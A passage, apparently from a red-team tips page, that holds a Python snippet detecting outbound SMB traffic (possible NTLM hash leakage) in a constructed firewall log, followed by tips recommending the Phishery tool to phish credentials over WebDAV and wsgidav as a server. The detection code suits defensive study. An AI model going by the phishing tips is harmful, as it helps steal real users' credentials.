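SMB_PORTS = {445, 139}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
                     r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)\s+(?P<action>\w+)$")

# Constructed firewall log: timestamp src:port -> dst:port proto action
FIREWALL_LOG = """\
2019-10-15T09:00:01 10.1.2.3:49213 -> 10.1.0.5:445 TCP ALLOW
2019-10-15T09:00:02 10.1.2.3:49214 -> 198.51.100.7:443 TCP ALLOW
2019-10-15T09:00:03 10.1.2.3:49215 -> 198.51.100.7:445 TCP ALLOW
2019-10-15T09:00:04 10.1.2.9:49300 -> 203.0.113.20:139 TCP DENY
2019-10-15T09:00:05 10.1.2.3:49216 -> 198.51.100.7:445 TCP ALLOW
"""


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def smb_egress(log_text):
    """Return sorted (src, dst, dport, allowed_count, denied_count) for every
    internal->external SMB flow; an ALLOW means a hash may already have left."""
    counts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        dport = int(m["dport"])
        if dport not in SMB_PORTS or not is_internal(m["src"]) or is_internal(m["dst"]):
            continue
        key = (m["src"], m["dst"], dport)
        allowed, denied = counts.get(key, (0, 0))
        if m["action"].upper() == "ALLOW":
            allowed += 1
        else:
            denied += 1
        counts[key] = (allowed, denied)
    return sorted((s, d, p, a, dn) for (s, d, p), (a, dn) in counts.items())


if __name__ == "__main__":
    for src, dst, port, allowed, denied in smb_egress(FIREWALL_LOG):
        print(f"{src} -> {dst}:{port} allowed={allowed} denied={denied}")
```

A DENY line still matters: it tells you which internal host opened something that pointed at an external UNC path, which is the lead for finding the document or page from tips #55 and #98.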
Red tip #99: If the client is using a proxy with WebDAV you can phish creds using @ryHanson's Phishery https://github.com/ryhanson/phishery
Red tip #100: Use wsgidav if you need a quick WebDAV server 😃 https://github.com/mar10/wsgidav